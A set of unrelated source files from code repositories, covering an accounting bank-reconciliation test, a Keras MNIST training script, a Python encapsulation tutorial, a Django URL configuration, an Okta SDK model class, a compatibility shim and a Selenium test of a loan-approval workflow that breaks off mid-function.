d301a9b536d8c15fbe982044f5825fcb03af8bef | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/account/tests/test_bank_statement_reconciliation.py | dbc8598d569ec2a6d0d936c8488e90da9fc8d820 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,056 | py | from harpiya.addons.account.tests.account_test_classes import AccountingTestCase
from harpiya.tests import tagged
@tagged('post_install', '-at_install')
class TestBankStatementReconciliation(AccountingTestCase):
def setUp(self):
super(TestBankStatementReconciliation, self).setUp()
self.bs_model = self.env['account.bank.statement']
self.bsl_model = self.env['account.bank.statement.line']
self.reconciliation_widget = self.env['account.reconciliation.widget']
self.partner = self.env['res.partner'].create({'name': 'test'})
self.currency_usd_id = self.env.ref("base.USD").id
self.currency_euro_id = self.env.ref("base.EUR").id
def test_reconciliation_proposition(self):
rcv_mv_line = self.create_invoice(100)
st_line = self.create_statement_line(100)
# exact amount match
rec_prop = self.reconciliation_widget.get_bank_statement_line_data(st_line.ids)['lines']
prop = rec_prop[0]['reconciliation_proposition']
self.assertEqual(len(prop), 1)
self.assertEqual(prop[0]['id'], rcv_mv_line.id)
def test_full_reconcile(self):
self._reconcile_invoice_with_statement('pay_val')
def test_post_at_bank_rec_full_reconcile(self):
""" Test the full reconciliation of a bank statement directly with an invoice.
"""
self._reconcile_invoice_with_statement('bank_rec')
def _reconcile_invoice_with_statement(self, post_at):
""" Tests the reconciliation of an invoice with a bank statement, using
the provided 'post at bank reconciliation' value for the bank journal
where to generate the statement.
"""
self.bs_model.with_context(journal_type='bank')._default_journal().post_at_bank_reconciliation = post_at == 'bank_rec'
rcv_mv_line = self.create_invoice(100)
st_line = self.create_statement_line(100)
# reconcile
st_line.process_reconciliation(counterpart_aml_dicts=[{
'move_line': rcv_mv_line,
'credit': 100,
'debit': 0,
'name': rcv_mv_line.name,
}])
# check everything went as expected
self.assertTrue(st_line.journal_entry_ids)
counterpart_mv_line = None
for l in st_line.journal_entry_ids:
if l.account_id.user_type_id.type == 'receivable':
counterpart_mv_line = l
break
self.assertIsNotNone(counterpart_mv_line)
self.assertTrue(rcv_mv_line.reconciled)
self.assertTrue(counterpart_mv_line.reconciled)
self.assertEqual(counterpart_mv_line.matched_credit_ids, rcv_mv_line.matched_debit_ids)
self.assertEqual(rcv_mv_line.move_id.invoice_payment_state, 'paid', "The related invoice's state should now be 'paid'")
def test_reconcile_with_write_off(self):
pass
def create_invoice(self, amount):
""" Return the move line that gets to be reconciled (the one in the receivable account) """
move = self.env['account.move'].create({
'type': 'out_invoice',
'partner_id': self.partner.id,
'invoice_line_ids': [(0, 0, {
'quantity': 1,
'price_unit': amount,
'name': 'test invoice',
})],
})
move.post()
return move.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable'))
def create_statement_line(self, st_line_amount):
journal = self.bs_model.with_context(journal_type='bank')._default_journal()
#journal = self.env.ref('l10n_be.bank_journal')
bank_stmt = self.bs_model.create({'journal_id': journal.id})
bank_stmt_line = self.bsl_model.create({
'name': '_',
'statement_id': bank_stmt.id,
'partner_id': self.partner.id,
'amount': st_line_amount,
})
return bank_stmt_line
def test_confirm_statement_usd(self):
company = self.env.ref('base.main_company')
self.cr.execute("UPDATE res_company SET currency_id = %s WHERE id = %s", [self.currency_euro_id, company.id])
self.env['res.currency.rate'].search([]).unlink()
self.env['res.currency.rate'].create({
'currency_id': self.currency_usd_id,
'rate': 2.0,
'name': '2001-01-01',
})
bank_journal_usd = self.env['account.journal'].create({
'name': 'Bank US',
'type': 'bank',
'code': 'BNK68',
'currency_id': self.currency_usd_id,
})
statement = self.bs_model.create({
'journal_id': bank_journal_usd.id,
'balance_end_real': 100,
'line_ids': [(0, 0, {
'name': '_',
'partner_id': self.partner.id,
'amount': 100,
'account_id': bank_journal_usd.default_debit_account_id.id,
})],
})
statement.button_open()
statement.button_confirm_bank()
| [
"yasir@harpiya.com"
] | yasir@harpiya.com |
640112112dfc01efccf5c8bd286908af5a23e0ef | 1cb0cc435061b6a0156b37813343ae46b1f7346e | /1_learn_step/try_second/normal-Adamax-128.py | bec42472cced5d42858f0b3fb5265b09bacb02eb | [] | no_license | youthliuxi/keras | 6370a9de11e152d8ba96e68e9ff02337203b7e66 | 60a367442f74313d0bd9af01f76068d56e23bec0 | refs/heads/master | 2020-04-30T19:54:16.628943 | 2019-08-21T09:47:13 | 2019-08-21T09:47:13 | 177,051,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,664 | py | # -*- coding:utf-8 -*-
from keras import backend as K
K.set_image_dim_ordering('th')
import numpy as np
np.random.seed(123)
from keras.layers import *
from keras.models import Sequential
from keras.utils import np_utils
from keras.datasets import mnist
# (X_train, y_train), (X_test, y_test) = mnist.load_data()
path = "./mnist.npz"
f = np.load(path)
X_train, y_train = f['x_train'],f['y_train']
X_test, y_test = f['x_test'],f['y_test']
X_train = X_train.reshape(X_train.shape[0], 1, 28, 28)
X_test = X_test.reshape(X_test.shape[0], 1, 28, 28)
import pylab
from matplotlib import pyplot as plt
X_train = X_train.reshape(X_train.shape[0], 1, 28, 28)
X_test = X_test.reshape(X_test.shape[0], 1, 28, 28)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
Y_train = np_utils.to_categorical(y_train, 10)
Y_test = np_utils.to_categorical(y_test, 10)
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu',init = 'normal', input_shape=(1,28,28)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',optimizer='Adamax',metrics=['accuracy'])
hist = model.fit(X_train, Y_train, batch_size=128, nb_epoch=100, verbose=1, validation_data=(X_test, Y_test))
log_file_name = "try_second/txt/normal-Adamax-128.txt"
with open(log_file_name,'w') as f:
f.write(str(hist.history))
# score = model.evaluate(X_test, Y_test, verbose=0, batch_size=128)
# print(score[0])
# print(score[1])
| [
"lx_einstein@sina.com"
] | lx_einstein@sina.com |
e660605572d83e89f80cee2e458890e18cd8664f | 3c8701e04900389adb40a46daedb5205d479016c | /liaoxuefeng/05-面像对象编程/02-访问限制.py | fbe708c3a95ee8d4a9d9763f74054445db652382 | [] | no_license | huboa/xuexi | 681300653b834eaf506f49987dcca83df48e8db7 | 91287721f188b5e24fbb4ccd63b60a80ed7b9426 | refs/heads/master | 2020-07-29T16:39:12.770272 | 2018-09-02T05:39:45 | 2018-09-02T05:39:45 | 73,660,825 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | class Student(object):
def __init__(self, name, score):
self.__name = name ###name 加上横线就变成了private 私有变量,只有内部可以访问,外部不能访问
self.__score = score
def print_score(self):
print('%s: %s' % (self.__name, self.__score))
def get_name(self): ###提供了新的方法供外部读取
return self.__name
def get_score(self):
return self.__score
def set_score(self, score): ###提供了新的方法供外部写入
if 0 <= score <= 100:
self.__score = score
else:
raise ValueError('bad score')
zsc=Student("赵胜冲",22)
bart = Student('Bart Simpson', 59)
print(zsc.get_name()) ####直接调用名字胡方法被限制,只能用get_name 获取了
###如果非要访问 可以直接
print(bart._Student__name)
| [
"wxcr11@gmail.com"
] | wxcr11@gmail.com |
a9207f2677a6c9f2a7e3870aea79ca983eafc2a6 | c22e1fe34211a62dd453946c226db06aab620368 | /mms/urls.py | 626838f8a01c482ca8afa51792694e9c72897a23 | [] | no_license | Mehedi-Bin-Hafiz/Hostel-management- | a45402fe591bb44e44a5a140c9aa8b0aa9fa5592 | 01cc0c0cb64c9cce444da8e1d4b664fa97cbf8de | refs/heads/master | 2022-03-04T02:16:56.893873 | 2019-10-05T11:58:49 | 2019-10-05T11:58:49 | 212,954,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | """mms URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import mealinput.views
import dailyexpense.views
import mealdashboard.views
import exdash.views
import index.views
import signup.views
import login.views
import manager.views
import userpro.views
import deposit.views
import depodash.views
urlpatterns = [
path('admin/', admin.site.urls),
path('',index.views.indexview,name="index"),
path('mealinput/', mealinput.views.mealinputformview, name="mealinput"),
path('expense/', dailyexpense.views.expenseformview, name="dailyexpense"),
path('deposit/', deposit.views.depositview, name="deposit"),
path('ddash/', depodash.views.depoview.as_view(), name="depodash"),
path('dashboard/', mealdashboard.views.mealview.as_view(), name="mealdashboard"),
path('edash/', exdash.views.exview.as_view(), name="exdash"),
path('signup/',signup.views.signupview,name="signup"),
path('login/',login.views.loginview,name="login"),
path('manager/',manager.views.managerview.as_view(),name='manager'),
path('userpro/',userpro.views.userproview.as_view(),name='userpro'),
path('logout/', index.views.logout, name="logout"),
]
| [
"mehedibinhafiz@gmail.com"
] | mehedibinhafiz@gmail.com |
652ee2326545c6f21803481114ec18c1a4f0726f | 7bb4954f798d295055607e1563269c2aeb10aca9 | /src/sample/tensorflow/list2/list2_1.py | ff895de22b34888156f367d15f226029f900a3e0 | [
"MIT"
] | permissive | mryyomutga/PDIII | 081aca58eb4159e3543e4e59cf1d8a4b8f84dbd1 | 2dc14e741349845bfe528c1dd06c434cf4414941 | refs/heads/master | 2020-03-08T17:56:51.845215 | 2019-02-15T01:16:53 | 2019-02-15T01:16:53 | 128,282,342 | 1 | 0 | null | 2018-12-22T15:11:29 | 2018-04-06T01:09:33 | Python | UTF-8 | Python | false | false | 369 | py | import tensorflow as tf
# constantは定数定義のAPI
# 単一の数字のテンソル
t1 = tf.constant(1, name="Rank0")
# 配列のテンソル
t2 = tf.constant([1, 2], name="Rank1")
# 多次元配列のテンソル
t3 = tf.constant([[1, 2], [3, 4]], name="Rank2")
with tf.Session() as sess:
print(sess.run(t1))
print(sess.run(t2))
print(sess.run(t3))
| [
"mryyomutga@gmail.com"
] | mryyomutga@gmail.com |
e2128c22737b078fb1161b9444fac63737b41c3a | 072077377f8c3181923ba84dc7b11e0a6d5afc2b | /vendors/okta/models/log_user_agent.py | c62996bcde78021e701321b423c904014c303a36 | [] | no_license | rafaelfoster/sophoscentral_okta_integration | c2a3ac472df6f2ac03770689f3c5213794f1e48e | d6170b700164ece51a831c27aee55bd498b94001 | refs/heads/master | 2023-02-15T11:30:40.195653 | 2021-01-07T21:32:35 | 2021-01-07T21:32:35 | 325,614,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,657 | py | # flake8: noqa
"""
Copyright 2020 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.okta_object import OktaObject
class LogUserAgent(
OktaObject
):
"""
A class for LogUserAgent objects.
"""
def __init__(self, config=None):
super().__init__(config)
if config:
self.browser = config["browser"]\
if "browser" in config else None
self.os = config["os"]\
if "os" in config else None
self.raw_user_agent = config["rawUserAgent"]\
if "rawUserAgent" in config else None
else:
self.browser = None
self.os = None
self.raw_user_agent = None
def request_format(self):
parent_req_format = super().request_format()
current_obj_format = {
"browser": self.browser,
"os": self.os,
"rawUserAgent": self.raw_user_agent
}
parent_req_format.update(current_obj_format)
return parent_req_format
| [
"rafaelgfoster@gmail.com"
] | rafaelgfoster@gmail.com |
8e495ea7490a463b054e66a65292e96eb033f824 | 074acb4439a97b76ea300b2c07d6a2457b04849f | /zombie/compat.py | 4cfeccdfa331e0ab2937545e840daf0fd2c336fe | [
"MIT"
] | permissive | graffic/python-zombie | 6d79ffb643034c27e84c18b697849d45eb901a06 | 7bfea60b3946d6b20dcc4f70896ffcfd4c55ac1f | refs/heads/master | 2021-01-20T21:57:11.314505 | 2013-08-04T15:12:01 | 2013-08-04T15:12:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | py | import sys
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3: # pragma: nocover
from io import BytesIO as StringIO
from urllib.parse import urlparse
else: # pragma: nocover
from urlparse import urlparse # noqa
from cStringIO import StringIO # noqa
| [
"lists@ryanpetrello.com"
] | lists@ryanpetrello.com |
267d7138ff4d9a19338307ad8f5304c7ad922e09 | 6d824eae55583dfabc130bbafb797e860914f10c | /.svn/pristine/12/12024d5e4dc490f0630c466d0c7c4d43fb47495e.svn-base | b95c9c1b6f602aedd6d36d3ad5b8c1d049dd93f2 | [] | no_license | sproutsbean/o2o | d97fd4840f983e4ff22746aaaeb1068f4c086755 | 2e2dbc35d756f5eda4232f0a737dcb3c074954e7 | refs/heads/master | 2021-05-05T19:23:20.733118 | 2018-01-17T03:30:25 | 2018-01-17T03:30:25 | 117,774,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,754 | #!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:user
@file: test_zhongduan_gongxiang.py
@time: 2017/12/11
"""
import unittest
from com.ea.common.cardname import cardname
from com.ea.common.cardnumber import IdCardNumber
from com.ea.common import login
from com.ea.resource import globalparameter as gl
from com.ea.common import menu
import time
from com.ea.common import tools
import os
import sys
class MyTestCase(unittest.TestCase):
u"""烟草贷自营模式"""
screenshot_path = os.path.join(gl.screenshot_path, os.path.splitext(os.path.basename(__file__))[0])
print(screenshot_path)
pic_path = gl.test_pic_path
cardNo = IdCardNumber.getRandomIdNumber(1)[0]
fullname, first_name, second_name, english_name = cardname.get_name()
phoneNo = cardname.createPhone()
loanno = ""
@classmethod
def setUpClass(cls):
cls.driver = tools.get_chrome_driver()
tools.del_pics(cls.screenshot_path)
login.login(cls.driver)
from com.ea.common.newzhengxin import NewZhengxin
cls.newzhengxin = NewZhengxin(cls.driver, cls.cardNo, cls.fullname, cls.first_name, cls.second_name,
cls.english_name, cls.phoneNo)
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def tearDownClass(cls):
cls.driver.quit()
# pass
def test_a_zhengxin_apply(self):
u"""创建征信"""
casename = sys._getframe().f_code.co_name
try:
self.newzhengxin.zhengxin_apply()
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_b_zhengxin_approve(self):
u"""审批征信"""
casename = sys._getframe().f_code.co_name
try:
self.newzhengxin.zhengxin_approve()
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_c_loan_apply(self):
u"""申请贷款"""
casename = sys._getframe().f_code.co_name
marray = "未婚"
loantype = "流通贷-烟草"
operator_mode = "自营模式"
loan_manager = "李"
loan_amount = "50000"
channel_name = "中国烟草"
operator_platform = "北京"
print("申请贷款开始")
# self.cardNo = "21020019741022267X"
print("采用的身份证号: " + self.cardNo)
from com.ea.pages.apply_loan_page import ApplyLoanPage
try:
menu.go_to_loan_apply(self.driver)
applyloanpage = ApplyLoanPage(self.driver)
applyloanpage.input_carno(self.cardNo)
applyloanpage.click_nextbutton()
applyloanpage.select_marry(marray)
applyloanpage.select_loantype(loantype)
applyloanpage.click_confirm_button()
applyloanpage.input_loanmanager(loan_manager)
applyloanpage.input_loanamount(loan_amount)
applyloanpage.select_managerment_mode(operator_mode)
applyloanpage.input_channel_name(channel_name)
applyloanpage.input_zy_operator_platform(operator_platform)
applyloanpage.click_savebutton()
applyloanpage.click_choose_zhengxin_button()
applyloanpage.click_afterzhengxin_savebutton()
applyloanpage.page_down()
applyloanpage.click_savebutton()
applyloanpage.click_commit_zhengxin_in()
MyTestCase.loanno = applyloanpage.get_loanno()
self.assertIsNotNone(self.loanno)
print("产生的贷款单号是:" + self.loanno)
print("申请贷款结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_d_loan_approve(self):
u"""贷款审批"""
casename = sys._getframe().f_code.co_name
number = "0"
view = "OK"
process_type = "征信准入"
except_result = "征信准入完成"
# self.loanno = "C380Z0067-BK-1712-00007"
print("审批贷款开始")
print("使用的贷款单号是:" + self.loanno)
from com.ea.pages.todo_page import TodoPage, ApproveLoanPage
try:
todopage = TodoPage(self.driver)
approvepage = ApproveLoanPage(self.driver)
# 进入待办查询页面
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
todopage.click_first_row(process_type)
approvepage.scrollto_edit()
approvepage.click_edit()
approvepage.input_bank_overdue(number)
approvepage.input_credit_overdue(number)
approvepage.input_nobank_overdue(number)
approvepage.scrollto_save_button()
approvepage.click_save_button()
time.sleep(2)
approvepage.scrollto_approve_view()
approvepage.input_approve_view(view)
approvepage.click_tongguo()
approvepage.click_confirm()
time.sleep(3)
menu.go_to_loan_query(self.driver)
time.sleep(1)
actual_result = approvepage.get_result(self.loanno)
self.assertEqual(actual_result, except_result)
print("审批贷款结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_f_edit_inside_apply(self):
u"""启动内部审批"""
casename = sys._getframe().f_code.co_name
expect_result = "审核中"
organization = "公安局"
home_phone = "075528560115"
wechat = "123564456"
postcode = "518001"
province = "北京"
city = "东城区"
road = "无名路"
live_years = "5"
children_description = "这里是子女情况描述"
contact_names = ["张三", "李四"]
contact_phones = ["13625648852", "13525648853"]
relationship = "朋友"
total_price = "20"
mj_price = "1"
zhizhao_name = "YYZZ0001"
register_no = "1025110001"
organization_type = "个体工商户"
register_time = "2017-01-01"
shareholder_number = "1"
share_proportion = "100"
business_isnormal = "无"
borrower_iscontroler = "是"
controler_name = self.fullname
yingye_mode = "便利店"
vocation_type = "百货"
start_time = "2017-01-01"
jinglirun = "20"
fuzhaizonge = "10"
nianxiaoshoue = "50"
six_month_sales = "3"
personnel_number = "5"
month_pay = "20000"
water_pay = "1000"
other_pay = "500"
transport_pay = "1500"
capital = "100"
nianjinglirun = "20"
should_pay = "50"
collect = "60"
liabilities = "10"
invest = "10"
property_type = "租赁"
env_description = "这里是门店经营环境描述"
store_phone = "57629280"
store_date = "2017-01-01"
area = "20"
shoprent_year = "20000"
shoprent_starttime = "2017-01-01"
shoprent_endtime = "2017-05-05"
store_value = "500000"
new_old = "很新"
zhengqi = "整齐"
store_description = "这里是存货效期描述"
loan_time = "6个月"
huankuan_type = "等额本息"
loan_yongtu = "流动资金"
eamount = "50000"
bankname = "江西银行"
tuijian_type = "合作方推荐"
tuijian_name = "李超"
danbao_type = "其它方式"
# self.loanno = "C380Z0067-BK-1712-00007"
print("开始申请内部审批")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.inside_page import InsidePage
insidepage = InsidePage(self.driver)
menu.go_to_inside_approve(self.driver)
handle1 = self.driver.current_window_handle
insidepage.click_first_row(self.loanno)
handles = self.driver.window_handles
handle2 = ""
for handle in handles:
if handle != handle1:
self.driver.switch_to.window(handle)
handle2 = self.driver.current_window_handle
time.sleep(2)
insidepage.click_editinside_button()
handles = self.driver.window_handles
for handle in handles:
if handle != handle1 and handle != handle2:
self.driver.switch_to.window(handle)
# 借款人基本信息
insidepage.click_editborrower_button()
insidepage.input_card_organization(organization)
insidepage.input_home_phone(home_phone)
insidepage.input_wechat(wechat)
insidepage.input_postcode(postcode)
insidepage.select_register_addr_province(province)
time.sleep(1)
insidepage.select_register_addr_city(city)
insidepage.input_register_addr_road(road)
insidepage.select_sleep_addr_province(province)
time.sleep(1)
insidepage.select_sleep_addr_city(city)
insidepage.input_sleep_addr_road(road)
insidepage.input_live_years(live_years)
insidepage.input_children(children_description)
insidepage.click_borrower_save()
insidepage.click_borrower_confirm()
time.sleep(1)
# 添加紧急联系人
insidepage.scroll_to_contact()
for i in range(2):
insidepage.click_contact_add()
insidepage.input_contact_name(contact_names[i])
insidepage.input_contact_phone(contact_phones[i])
insidepage.select_contacts_relationship(relationship)
insidepage.click_contact_save()
time.sleep(2)
# 夫妻双方负债情况
insidepage.click_edit_fuzhai()
insidepage.input_total_price(total_price)
insidepage.input_mj_price(mj_price)
insidepage.click_fuzhai_save()
time.sleep(1)
# 经营主体信息
insidepage.scroll_to_jingyingzhuti_edit_button()
insidepage.click_jingyingzhuti_edit()
insidepage.input_yingyezhizhao_name(zhizhao_name)
insidepage.input_zhucehao(register_no)
insidepage.select_organization_type(organization_type)
insidepage.input_register_time(register_time)
insidepage.select_zhizhao_addr_province(province)
time.sleep(1)
insidepage.select_zhizhao_addr_city(city)
insidepage.input_zhizhao_addr_road(road)
insidepage.input_shareholder_number(shareholder_number)
insidepage.input_share_proportion(share_proportion)
insidepage.select_business_isnormal(business_isnormal)
insidepage.select_borrower_iscontroler(borrower_iscontroler)
insidepage.input_controler_name(controler_name)
insidepage.select_yingye_mode(yingye_mode)
insidepage.select_vocation_type(vocation_type)
insidepage.input_start_time(start_time)
insidepage.click_zhuti_submit_button()
time.sleep(3)
# 经营历史
insidepage.click_history_add()
insidepage.click_years()
insidepage.input_jingli(jinglirun)
insidepage.input_fuzhaizonge(fuzhaizonge)
insidepage.input_nianxiaoshoue(nianxiaoshoue)
insidepage.click_history_save_button()
time.sleep(2)
# 近6个月营业额情况
insidepage.click_six_month_edit()
insidepage.input_january(six_month_sales)
insidepage.input_february(six_month_sales)
insidepage.input_march(six_month_sales)
insidepage.input_april(six_month_sales)
insidepage.input_may(six_month_sales)
insidepage.input_june(six_month_sales)
insidepage.click_six_month_submit()
time.sleep(2)
# 编辑经营状况
insidepage.click_edit_status()
insidepage.input_personnel_number(personnel_number)
insidepage.input_month_pay(month_pay)
insidepage.input_water_pay(water_pay)
insidepage.input_other_pay(other_pay)
insidepage.input_transport_pay(transport_pay)
insidepage.input_capital(capital)
insidepage.input_nianjinglirun(nianjinglirun)
insidepage.click_bank_water()
insidepage.input_should_pay(should_pay)
insidepage.input_collect(collect)
insidepage.input_liabilities(liabilities)
insidepage.input_invest(invest)
insidepage.click_status_save_button()
time.sleep(2)
# 新增门店信息
insidepage.scroll_to_store()
insidepage.click_store_add_button()
insidepage.select_property_type(property_type)
insidepage.input_env_description(env_description)
insidepage.input_store_phone(store_phone)
insidepage.input_store_date(store_date)
insidepage.select_store_addr_province(province)
time.sleep(1)
insidepage.select_store_addr_city(city)
insidepage.input_store_addr_road(road)
insidepage.input_business_area(area)
insidepage.input_shoprent_year(shoprent_year)
insidepage.input_shoprent_starttime(shoprent_starttime)
insidepage.input_shoprent_endtime(shoprent_endtime)
insidepage.input_store_value(store_value)
insidepage.select_new_old(new_old)
insidepage.select_zhengqi(zhengqi)
insidepage.input_store_description(store_description)
insidepage.click_store_submit()
time.sleep(2)
# 编辑贷款信息
insidepage.scroll_to_loan_info()
time.sleep(1)
insidepage.select_loan_time(loan_time)
insidepage.select_huankuan_type(huankuan_type)
insidepage.input_eamount(eamount)
insidepage.select_loan_yongtu(loan_yongtu)
insidepage.select_loan_bankname(bankname)
insidepage.select_tuijian_type(tuijian_type)
insidepage.input_tuijian_name(tuijian_name)
insidepage.select_danbao_type(danbao_type)
insidepage.click_loan_info_save()
insidepage.click_loan_info_confirm()
self.driver.close()
# 切换到内审详情页面
self.driver.switch_to.window(handle2)
insidepage.click_submit_inside_approve()
time.sleep(1)
# 关闭内审详情页面
self.driver.close()
# 切换到内部审批页面
self.driver.switch_to.window(handle1)
# 刷新页面
self.driver.refresh()
actual_result = insidepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("申请内部审批结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_g_approve_inside(self):
u"""审批内部审批流程"""
casename = sys._getframe().f_code.co_name
expect_result = "结束"
process_type = "内部审批"
view = "OK"
print("开始审批内审流程")
print("使用的贷款单号是:" + self.loanno)
# self.loanno = "SK0027-BK-1712-00012"
from com.ea.pages.todo_page import TodoPage, ApproveInsidePage
todopage = TodoPage(self.driver)
approveinsidepage = ApproveInsidePage(self.driver)
# 进入待办查询页面
try:
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
for i in range(4):
todopage.click_first_row(process_type)
approveinsidepage.scroll_to_approve_view()
approveinsidepage.input_approve_view(view)
approveinsidepage.click_tongguo_button()
approveinsidepage.click_confirm_button()
time.sleep(5)
# 切换到内部审批页面
menu.go_to_inside_approve(self.driver)
actual_result = approveinsidepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("审批内审流程结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_h_charge_apply(self):
u"""启动收费流程"""
casename = sys._getframe().f_code.co_name
expect_result = "审核中"
# self.loanno = "SK0027-BK-1712-00012"
print("启动收费流程开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.charge_page import ChargePage
chargepage = ChargePage(self.driver)
menu.go_to_charge_query(self.driver)
chargepage.click_loan_no(self.loanno)
chargepage.click_start_flow()
time.sleep(2)
actual_result = chargepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("启动收费流程结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_i_charge_approve(self):
u"""审批收费流程"""
casename = sys._getframe().f_code.co_name
expect_result = "流程结束"
process_type = "保证金管理费"
pay_time = "2017-10-10"
approve_view = "OK"
daokuan_total = "50000"
pay_date = "2017-10-10"
# self.loanno = "SK0027-BK-1712-00012"
print("审批收费流程开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.todo_page import TodoPage, ApproveCharge
todopage = TodoPage(self.driver)
approvechaegepage = ApproveCharge(self.driver)
# 进入待办查询页面
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
todopage.click_first_row(process_type)
approvechaegepage.scroll_to_payer()
approvechaegepage.input_payer(self.fullname)
approvechaegepage.input_pay_time(pay_time)
approvechaegepage.click_save_button()
time.sleep(1)
approvechaegepage.scroll_to_approve_view()
time.sleep(3)
approvechaegepage.input_print_voucher(self.pic_path)
time.sleep(1)
approvechaegepage.input_approve_view(approve_view)
approvechaegepage.click_tongguo_button()
approvechaegepage.click_confirm_button()
time.sleep(5)
todopage.click_first_row(process_type)
approvechaegepage.scroll_to_daokuan_total()
time.sleep(1)
approvechaegepage.input_daokuan_total(daokuan_total)
approvechaegepage.input_pay_date(pay_date)
approvechaegepage.select_collect_acount(1)
approvechaegepage.click_save_button()
approvechaegepage.scroll_to_approve_view()
approvechaegepage.input_approve_view(approve_view)
approvechaegepage.click_tongguo_button()
approvechaegepage.click_confirm_button()
time.sleep(5)
menu.go_to_charge_query(self.driver)
actual_result = approvechaegepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("审批收费流程结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_j_interview_apply(self):
u"""面签提报"""
casename = sys._getframe().f_code.co_name
expect_result = "审核中"
jiekuanhetong_flag = "是"
# self.loanno = "SK0027-BK-1712-00012"
print("申请面签提报开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.interview_page import InterviewPage
interviewpage = InterviewPage(self.driver)
# 进入到面签提报页面
menu.go_to_interview_report(self.driver)
handle1 = self.driver.current_window_handle
interviewpage.click_loan_no(self.loanno)
handles = self.driver.window_handles
for handle in handles:
if handle != handle1:
self.driver.switch_to.window(handle)
time.sleep(1)
interviewpage.click_edit_interview_button()
interviewpage.select_jiekuanhetong(jiekuanhetong_flag)
interviewpage.click_save_button()
interviewpage.click_confirm_button()
time.sleep(1)
interviewpage.input_file(self.pic_path)
time.sleep(1)
interviewpage.click_close_button()
time.sleep(1)
interviewpage.click_interview_submit()
# 关闭申报详情页面
self.driver.close()
# 切换到内部审批页面
self.driver.switch_to.window(handle1)
# 刷新页面
self.driver.refresh()
actual_result = interviewpage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("申请面签提报结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_k_interview_approve(self):
u"""面签审批"""
casename = sys._getframe().f_code.co_name
expect_result = "已放款"
types = "面签提报"
card_daoqi_date = "2028-10-10"
approve_view = "OK"
isphonecheck = "是"
phonecheckmessage = "OK"
isfujianover = "是"
file_path = gl.file_path
# self.loanno = "SK0027-BK-1712-00012"
print("面签审批开始")
print("使用的贷款单号是:" + self.loanno)
try:
from com.ea.pages.todo_page import TodoPage, ApproveInterview
todopage = TodoPage(self.driver)
approveinterviepage = ApproveInterview(self.driver)
menu.go_to_wait_todo_query(self.driver)
todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
todopage.click_first_row(types)
approveinterviepage.scroll_to_approve_view()
approveinterviepage.input_approve_view(approve_view)
approveinterviepage.click_tongguo()
approveinterviepage.click_confirm()
time.sleep(5)
todopage.click_first_row(types)
